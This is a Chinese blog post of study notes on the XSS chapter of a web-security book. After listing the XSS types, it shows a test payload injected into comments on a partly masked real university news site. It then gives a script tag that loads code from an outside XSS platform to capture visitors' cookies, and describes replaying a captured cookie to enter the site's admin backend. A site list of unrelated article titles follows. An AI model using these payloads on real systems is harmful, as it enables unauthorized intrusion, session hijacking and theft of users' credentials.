白帽子讲web安全之3
来源:互联网 发布:注册淘宝药店 编辑:程序博客网 时间:2024/05/01 17:05
看到xss章节,很多还是不太懂的,还需要再继续学习javascript等相关的知识,推荐学习网站http://www.w3cschool.cn/,下面的知识点是主要是之前看到过的内容,并附上自己的小实战
xss类型
1. 反射型
2. 存储型
3. DOM Based型
原理:
注:上图来自http://yttitan.blog.51cto.com/70821/1571910
实战例子:
- 存储式跨站脚本漏洞检测
在留言内容中填写包含有跨站测试的脚本,提交后观察返回效果。
<script>alert("XSS TEST")</script>
新闻网能评论的地方都有相应的xss漏洞,下面举例
Url:http://news.*.edu.cn//html/zonghexw/show_8890.html
验证:利用xssnow平台
将如图中的代码写入评论区,即xss盲打
提交评论后弹窗,提交成功,由于需要管理审核要等待,我们可以进行本地触发。
2. 利用存储式跨站漏洞窃取用户cookie
首先将<script src=http://xssnow.com/JoEL></script>
将其保存为xsstest.html文件,如下图
然后打开xsstest.html,再到xssnow平台查看项目内容如下图可以得到cookie
3. 利用xss平台 如xssnow、webxss 等获取cookie 然后用阿D浏览网页,修改cookie,然后再刷新网页就是后台管理页面了
0 0
- 白帽子讲web安全之3
- 白帽子讲web安全之1
- 白帽子讲web安全之2
- 白帽子讲web安全之4
- 白帽子讲web安全之5
- 白帽子讲web安全之6
- 白帽子讲Web安全
- 白帽子讲Web安全
- 白帽子讲Web安全
- 白帽子讲web安全
- 白帽子讲Web安全读书笔记
- 《白帽子讲Web安全》读书笔记
- 白帽子讲Web安全 札记
- 白帽子讲web安全 读书笔记
- 读后感 《白帽子讲Web安全》
- 读书笔记/白帽子讲web安全【xss】
- 白帽子讲web安全(1)
- 白帽子讲WEB安全笔记
- 开启csdn博客之旅~
- c#总结(二)
- 表单设计过程中常见问题梳理
- POJ 2823 Sliding Window 已翻译
- 【LaTeX】WinEdt编辑UTF-8中文文档出现乱码或编译错误"Package CJK Error: Invalid character code"的解决方案
- 白帽子讲web安全之3
- Spring4的知识应用总结(三)——Bean之间的关系和作用域
- POJ 3260 The Fewest Coins 已翻译
- 【Day65】php常用字符串转换,替换,计算,截取,加密函数实例
- 方法数超过64K:The number of method references in a .dex file cannot exceed 64K.
- [J2EE]jsp项目中使用UEditor富文本编辑器
- opencv学习笔记(七)从电脑摄像头读入数据
- Retry重试机制
- c# datagridview 使用大全